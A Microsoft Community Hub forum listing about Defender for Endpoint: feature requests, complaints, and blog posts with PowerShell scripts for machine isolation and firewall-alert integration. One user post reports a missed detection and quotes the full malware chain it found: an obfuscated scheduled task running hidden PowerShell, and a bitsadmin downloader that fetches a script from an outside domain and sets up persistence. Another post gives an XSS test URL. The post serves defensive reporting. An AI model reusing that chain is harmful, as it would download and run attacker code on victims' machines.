Microsoft Defender for Endpoint | Microsoft Community Hub

Connect with experts and redefine what’s possible at work – join us at the Microsoft 365 Community Conference May 6-8. Learn more >

Forum Widgets

Latest Discussions

How to Create a Custom Slack Alert for Windows Defender ATP using Microsoft Flow in 5 minutes
MVP WDATP API Hackathon has just ended 2h ago and first outcome is blogged. If you like the following blog, please credit the author with a "like" here in tech community. https://azurementor.wordpress.com/2019/03/22/how-to-create-a-custom-slack-alert-for-windows-defender-advanced-threat-protection-atp-using-microsoft-flow-in-5-minutes/
Solved
Dan Michelson
Microsoft
Mar 22, 2019
7KViews
22likes
2Comments
Automate response with Defender ATP and Microsoft Flow
Another cool product of the MVP Summit Hackathon by Stefan Schörling. Step by step blog will guide you in how to automate responses with MDATP Flow connector. don't forget to show your love. Use the like button here and share your feedback in this conversation. http://blog.sec-labs.com/2019/04/automate-response-with-defender-atp-and-microsoft-flow/
Dan Michelson
Microsoft
Apr 08, 2019
3.4KViews
19likes
0Comments
YARA rule support
Hi everybody, I'm curious if Microsoft is planniung to support YARA rules. I think that this will become even more important in the future. I fould this verry old thread from 2019, where this question was asked from other folks: IS MS looking to support custom YARA rules for Windows Defender ATP - Microsoft Tech Community Unfortunately, it looks like that nothing happend so far. Best regards Stefan
SteBeSec
Iron Contributor
Apr 17, 2021
Feature Request
12KViews
14likes
1Comment
MUST be able to delete duplicate/orphaned devices from M365 Security Center
Good morning, I am about 2-3 weeks into evaluating Microsoft Defender for Endpoint, and so far have about 4 Windows 10 devices onboarded and managed through InTune policies. One of the test machines was a fairly fresh build (1903) of Windows 10 when it was onboarded. As such it generated over 900+ vulnerabilities in TVM. However, during the course of the next day or two as it got itself patched all the way to 20H2 it then for some reason generated a duplicate device in the M365 portal - with exactly the same Device AAD id - currently both the "old" and "new" devices are showing as Active 5 days later. So first of all, this a nightmare that the duplicate device was created in the first place with the same Device AAD id - so what happens when one of my customer's networks gets upgraded with 500 Windows 10 devices from version X to 20H2 - are there going to be 500 duplicate devices created??? I read lots of articles yesterday about people seeing this issue as far back as 2018 where they just need to be able to lance out a given machine or machines(s) for whatever reason from the database to keep everything tidy. I spent hours looking for a solution. We have a 180 day Retention period set. I'm not waiting 6 months for my database to clean itself up due to a bug in the platform, you've got to be kidding! Given that this has happened after only onboarding 4 devices it's not leaving a good taste in my mouth. And how do I explain this to my customers???? The real problem however is the severe impact this has on the TVM reporting. As I mentioned, the machine patched itself without issue all the way to 20H2, as such all 900+ vulnerabilities have been addressed - like literally *all* of them. However, when I look at any Dashboard in Threat & Vulnerability Management the stats are all completely skewed due to this device's statistics still being accounted for. Given the VALUE of the TVM data, which I think is BRILLIANT - to have the CONTEXT skewed due to this duplicate device bug but most importantly the lack of basic functionality to remove an orphaned machine to tidy things up is completely unacceptable. As the Administrator of my own estate (and my customers estates) I should be able to have the final say in terms of a judgement call on what devices should be listed in the portal. Waiting for a device to be Inactive for 6 months to have it's clean-up routine run by the platform automatically isn't acceptable. The Offboarding script workaround I've been reading about isn't going to cut it either, so please don't' suggest it. I tried it using the API explorer method and running the local Offboarding script on said machine yesterday. Neither method worked as both devices 18 hours later are still showing in the portal. This method also doesn't account for machines that (for whatever reason) will not be able to contact the portal to Check In and receive the Offboarding command. (Lost device, test device, corrupt device, BYOD - the list goes on) So...... Microsoft - please, please, please, please - can we get a Delete button against the device actions menu so that we can clean up our estate and keep our TVM figures accurate - otherwise, what is the point of any of the statistics and recommendations displayed if you can't/have already acted on them?? So when senior management ask, What's our posture? The answer would unfortunately still be, "Dunno." Thank you.
Solved
James_Gillies
Brass Contributor
Apr 27, 2021
34KViews
11likes
18Comments
[MDE] Add the important feature, Yara rules if possible
Hi, Refer to this advisory (first link). In addition, you can see that there are Yara rules from GitHub (inside pdf). (2nd link) All EDR/XDR companies (except Microsoft) already have features and a Yara rule configuration for the incident responders to detect. The method of adding and detecting Yara rules has been in practice across companies for many years. Would you mind advising on any reason why not adding the important feature, Yara rules? It would be good if you include the important feature, Yara rules. If not, would you mind advising on converting from Yara rules to MDE query for querying via advanced threat hunting? Thanks much appreciated. 🙂 https://www.csa.gov.sg/singcert/Advisories/ad-2021-007 This link is the Yara rule. https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/yara-rule-support/m-p/2276820
tay76
Copper Contributor
Aug 25, 2021
20KViews
10likes
5Comments
Automate Windows Defender ATP response action: Machine isolation
5 Minutes Low complexity Response teams rely on powerful actions that allow them take immediate action when a threat is identified. Being able to automate those response actions is a powerful way to enhance a SecOps team’s workflow. In this blog, we’re going to demonstrate how you can automate the machine isolation response action. In our previous blogs we’ve demonstrated how you can: Setup an app and create a script to get WDATP’s alerts (Hello World blog) This is a good reference for when you need to create a new app. Grant more permission, get and update alerts as part of a ticketing/SIEM/SOAR integration (Ticketing System Integration blog) This is a good source of information to learn how to add more permissions on apps. For response teams, a typical use case involves the ability to enrich SIEM or SOAR playbooks with Windows Defender ATP’s powerful remediation capabilities. Just imagine how powerful it can be to detect a malicious activity using your firewall or IPS and isolate the suspicious machine wherever it is (even if the machine is off network at time of response). In this blog, we’ll walk you through using the machine isolation API. This response action will leave the machine disconnected from any network connection other than the Windows Defender ATP channel (allowing Windows Defender ATP to undo). What’s great about this demonstration is that it can be applied with the other response actions documented here. Let’s start In this section, we’ll walk you through the following: Step 1: Add the required permission to your application Step 2: Isolate a machine by machine ID or machine name Step 1 - Add the required permission to the application: If you haven’t created an app: Create an app using the instructions described in the Hello world blog. Then follow the instructions on how to Add Isolation Permission as described below If you’ve already created an app that you’re going to reuse for this demonstration: Add the “Isolate Machine” permission as described below We recommend that you follow the detailed steps as described in the “Step 1 - Add the required permission to the application” in the Alert Update API blog Add Isolation Permission Open Azure portal Navigate to Azure Active Directory > App registrations Under All Apps, find and select the application, for example ContosoSIEMConnector Navigate to Settings > Required permissions > Enable Access Select the checkbox for Isolate machine application permission. Click Save and Grant Permissions. Done! You have successfully added the required permissions to the application. Step 2 – Isolate a machine by machine ID or machine name: Save the following script file as IsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved). IsolateMachine.ps1 param ( [Parameter(Mandatory=$true)][string]$comment, #any comment that help [Parameter(Mandatory=$true)][string]$machineIdOrComputerDnsName, #the machineID or ComputerDnsName [Parameter(Mandatory=$true)] [ValidateSet('Full','Selective')] #validate that the input contains valid isolation type [string]$isolationType #the type of machine isolation ) $token = ./Get-Token.ps1 #Execute Get-Token.ps1 script to get the authorization token $url = "https://api.securitycenter.windows.com/api/machines/$machineIdOrComputerDnsName/Isolate" $body = @{ "Comment" = $comment “IsolationType” = $isolationType } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop if($response.StatusCode -eq 201) #check the response status code { return $true #update ended successfully } else { return $false #update failed } Example 1: Isolate by machine DNS name Find the machine FQDN in the machine page (concatenate the machine name and the domain) For example, to isolate the machine testMachine.contoso.com use the following command: .\IsolateMachine.ps1 -machineIdOrComputerDnsName testMachine.contoso.com -comment “isolate because of alert” -isolationType Full Example 2: Isolate by using machine ID Find the machine ID in the URL of the machine page For example, to isolate machine where machine page URL is https://securitycenter.windows.com/_machine/1f2258dc516c7bf8ec62466e2e876774c0a984f3 use the following command: .\IsolateMachine.ps1 -machineIdOrComputerDnsName 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment “isolate because of alert” -isolationType Full Example 3: Isolate machines with severe alerts Read high severity alerts as described in the previous blogs Use the machine ID found in the alert to isolate the machine using the following script GetSevereAlertsAndIsolate.ps1 # Returns Alerts created in the past 1 hour. and Isolate machines with high severity alerts $token = .\get-token.ps1 $dateTime = (Get-Date).ToUniversalTime().AddHours(-1).ToString("o") #create url with filter for date and severity $url = "https://api.securitycenter.windows.com/api/alerts?`$filter=alertCreationTime ge $dateTime and severity eq 'High'" $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-RestMethod -Method Get -Uri $url -Headers $headers -ErrorAction Stop #foreach alert, get the machineId and alertId and isloate machine while writing the alert ID in the isolation comments. foreach ($alert in $response.value){ $machineId = $alert.machineId $alertId = $alert.id $url = "https://api.securitycenter.windows.com/api/machines/$machineId/Isolate" $body = @{ Comment = "Isolate machine because alert - $alertId" } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop #check the isolatino request code and write to log file. if($response.StatusCode -eq 201) { Add-Content c:\temp\api\log.txt "The isolation of machine $machineId ended successfully" } else { Add-Content c:\temp\api\log.txt "Failed to isolate machine $machineId" } } Example 4: Release machine (un-isolate) Save the script below as UnIsolateMachine.ps1 file to the same folder where you save the Hello World example (where Get-Token.ps1 was saved). UnisolateMachine.ps1 param ( [Parameter(Mandatory=$true)][string]$comment, [Parameter(Mandatory=$true)][string]$machineId ) $token = ./Get-Token.ps1 $url = "https://api.securitycenter.windows.com/api/machines/$machineId/UnIsolate" $body = @{ Comment = $comment } $headers = @{ 'Content-Type' = 'application/json' Accept = 'application/json' Authorization = "Bearer $token" } $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop return ($response.Content | ConvertFrom-Json) Use the following script in the same way to release the machine from isolation .\UnIsolateMachine.ps1 -machineId 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment “un-isolate – machine was found clean” Conclusion: In this blog we demonstrated how you can easily automate Windows Defender ATP response actions. There are more actions you can automate such as run an antivirus scan and restrict app execution. For more information, see more the other actions here . Let us know if you are interested in more specific remediation examples. In the next blog we’ll demonstrate the integration of alerts from other detection sources. Thanks! @Haim Goldshtein, security software engineer, Windows Defender ATP @Dan Michelson, program manager, Windows Defender ATP
Haim Goldshtein
Microsoft
Mar 07, 2019
32KViews
8likes
5Comments
WDATP alert/incident assignment
Hello, When we I look at alert on the console, I'm able to perform an action that assigns it to myself. I would like to be also able to assign it to others in my organization (we have a team of people respond to WDATP alerts). is there any option to do that?
Yury Kissin
Brass Contributor
Apr 15, 2019
1.6KViews
7likes
4Comments
False positive: Suspicious PowEmotet behavior was blocked
Based on social media posts, it seems quite a few of us are experiencing numerous false positive alerts related to 'PowEmotet'. While it's understandable that false positives happen it's also somewhat amazing this one made it through QA. But this also highlights some things that I find extremely frustrating about Defender for Endpoint. There does not seem to be a reliable way to deal with these at a tenant level, aside from setting status to "false positive" and potentially adding a file hash of a related executable to Indicators and hoping it goes away. Is there anything I'm missing here? Also, where is Microsoft acknowledging this issue? Where should I go for up to the minute updates on occurrences like this?
GuyThreep
Copper Contributor
Dec 01, 2021
6.5KViews
7likes
0Comments
Malware not detected (but it should)
Some days ago a colleague has received an email (O365 ATP protected) and clicked the link inside. The link caused a zip file to be downloaded the zip contained2 files, a shortcut and a xml file the shortcut actually created a scheduled task: %windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'" so a cmd was started and then a powershell command to parse the content of the zip file the zip file contained the string below (to install the malware) Now the malware is correctly detected but a week ago it wasn't; the reason of concern is that Defender ATP SHOULD have detected a suspicious activity a zip was downloaded the lnk file when double-clicked created a task the task has launched a cmd, the cmd has launched a powershell and the powershell has gone through the file system to get the original zip and install the malware I'm wondering why no suspicious activity was detected. I also wonder why there is no a way to interact with MSFT support in such a case if you don't have a support plan; evidence is that i'm facing a product issue The string contained at the end of the zip file: $IPgHSp9NqFwlyUdz9EiUaC=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming'; start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable'; $1ky8EqL4xuTNcMdlzE160A0 = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $d9aSs4246nDe2406Bu0oGMC=$1ky8EqL4xuTNcMdlzE160A0.Substring(0,6); $2mg4sgEtuOEmhIplOMZ3O34 = $IPgHSp9NqFwlyUdz9EiUaC+'\'+$d9aSs4246nDe2406Bu0oGMC;If(test-path $2mg4sgEtuOEmhIplOMZ3O34"\_in"){$gZ6ZH3E1bBYDLsCi90GNDKJzl = (Get-Date).AddMinutes(-20);$gwbsm1Im8I4bn6mZ40KwC3GD=Get-ChildItem -Path $2mg4sgEtuOEmhIplOMZ3O34"\_in" | Where-Object {$_.LastWriteTime -gt $gZ6ZH3E1bBYDLsCi90GNDKJzl };if ($gwbsm1Im8I4bn6mZ40KwC3GD){exit;}}; New-Item -ItemType Directory -Force -Path $2mg4sgEtuOEmhIplOMZ3O34;$rr="`$namKgJJlKuRmxyZh=""$2mg4sgEtuOEmhIplOMZ3O34\sbr_init.ps1"";`$clpsr='/C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND ""https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg"" ""'+`$namKgJJlKuRmxyZh+'""'; start-process -wiNdowStylE HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$namKgJJlKuRmxyZh){`$e=3;}Start-Sleep -s 3;};`$clpsr='/C powershell -win hidden -ep bypass -File '+`$namKgJJlKuRmxyZh;start-process -wiNdowStylE HiDden cmd.exe `$clpsr;";$rr | out-file $2mg4sgEtuOEmhIplOMZ3O34'\KG1PNqifExGVCbhCkcxwnc.ps1';$VEzW3fIGi5Wmyd12HPG46o=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$2mg4sgEtuOEmhIplOMZ3O34+'\KG1PNqifExGVCbhCkcxwnc.ps1 "'; start-process -wiNdowStylE HiDden schtasks $VEzW3fIGi5Wmyd12HPG46o;
pbaratta
Brass Contributor
May 29, 2019
4.7KViews
6likes
4Comments
Palo Alto Networks and WDATP ad-hoc integration
Integrate your Palo Alto Networks firewall alerts directly into WDATP machine timeline and alert queue 5 Minutes Low complexity Firewall and IPS/IDS are common tools in every organization’s security toolbox. While those tools can proficiently detect suspicious connections to command and control servers (C2 server) from a client machine, actionable alerts that pinpoint the process which created the connection are not surfaced for security teams to investigate and respond to. In this blog we’ll demonstrate how to integrate Palo Alto Networks Next-Gen Firewall alerts with Windows Defender ATP to leverage the power of their detections to identify actionable alerts. Palo Alto Networks Next-Gen Firewall has an API which allows Palo Alto’s customers to get alerts from the alerts log of both the firewall and WildFire sandbox. You can choose to use the API to get information from a specific firewall appliance or use the same API with Palo Alto Networks Panorama which allows you to get the alerts from all of your Palo Alto Networks Next-Gen Firewall and WildFire appliances. You can get the full documentation of the Palo Alto Networks API here. Let’s start It is only 3 simple steps that will get you the desired integration: Step 1: Settings in Palo Alto Networks Next-Gen Firewall. Read-only API role creation User creation and role assignment Update the sample script Step 2: Windows Defender ATP settings: Add API permissions. Step 3: Test runs WildFire alert Firewall alert Step 1 - Settings in Palo Alto Networks Next-Gen Firewall: To get the alerts from Palo Alto Networks Next-Gen Firewall we first need to create a user on the firewall with the required permissions: Open the Palo Alto Networks Next-Gen Firewall administration console. Login as a privileged user. Go to Device > Admin Role > Add. Give a name to the role and remove all the permissions on all tabs except from “Log” permission under XML-API tab then click OK. Go to Device > Administrators > Add. Enter a name and a password, choose “Role Based” in the administrator type settings and in the profile’s field chose the role we created. Important!!! Click Commit on the right upper corner. Done! you have successfully added a user with the required permissions. Note: since many organizations leave the firewall with the default self-signed certificate, I’ve added a bypass in the script (published by PoshKazun on Github). If your firewall is set with a trusted certificate you can change the “trustSelfSignCertificate” parameter to false. Download the Powershell script attached to this blog and save it in the same folder you save the Get-Token.ps1 script from the Hello world blog and modify the “#### required information from step 1 #####” section A typical section may look like: $firewallURL = "https://TheUrlToYourFireallMgmtConsole" $username = "theNewUserWeCreated" $password = "NewUserPassword" $alertQueryTimeframe = 30 $minimumAlertSeverity = "medium" Done! you successfully complete the required steps to use Palo Alto Networks API Step 2: Settings in Windows Defender ATP In this step, we will add the required permissions to Windows Defender ATP. we will add the permission to the application we set in the Hello World blog. If you didn’t setup an application yet, you need to follow the hello world 3 short steps to create one. First, we need to add the permission “Run advance queries” and “Read and write all alerts” Open the Azure portal. Navigate to Azure Active Directory > App registrations. Under All Apps, find and select the application, for example, ContosoSIEMConnector. Navigate to Settings > Required permissions > Enable Access. Select the checkbox for “Run advance queries” and “Read and write alert” application permission. Click Save and Grant Permissions. Done! you successfully added the required permission to windows Defender ATP. Step 3: Test runs WildFire Alert Download Palo Alto Networks Wildfire test file and create an alert in WDATP Portal. Open your browser and navigate to https://wildfire.paloaltonetworks.com/publicapi/test/pe Wait 5-10 minutes and run the powershell script. Firewall Alert Create a fake suspicious network connection and create an alert in WDATP Portal. Open your browser and navigate to https://testing.com/book.html?default=<script>alert(XSS test)</script> Wait 5 minutes and run the powershell script. Note: if your firewall policy action for vulnerabilities set to “Reset-both”, then the firewall will reset the connection before it starts. In that case, you will not find a network connection telemetry in WDATP portal. Now open WDATP portal and look for the alerts. You should find Palo Alto Network firewall alert and Palo Alto Networks Wildfire alerts in WDATP alert queue. And in machine timeline: Recommendations: We recommend scheduling the integration script to run every 20 minutes with alertQueryTimeframe set to 30 minutes to allow overlap. Conclusion: While network protection solutions catch the threats in the network bottleneck, they still miss the context and the ability to remediate the endpoint. The combination of Palo Alto Networks firewall and WDATP creates a unique better-together value from detection to remediation. In future blogs we'll show you how to force AutoIR to automatically remediate the root of the threat. You can follow these steps to create Windows Defender ATP's alerts from other security/SOAR/SIEM solutions. Let us know if you are interested to integrate alerts from other sources. Thanks! @Haim Goldshtein, security software engineer, Windows Defender ATP @Dan Michelson, program manager, Windows Defender ATP @Ben Alfasi, software engineer, Windows Defender ATP
Haim Goldshtein
Microsoft
Mar 16, 2019
20KViews
6likes
13Comments

Resources

Tags

Defender14 Topics
MDATP13 Topics
Defender for Endpoint13 Topics
defender atp10 Topics
ATP10 Topics
security7 Topics
Defender Advanced Threat Protection6 Topics
microsoft defender for endpoint6 Topics
Microsoft Defender ATP5 Topics
MDE5 Topics

Share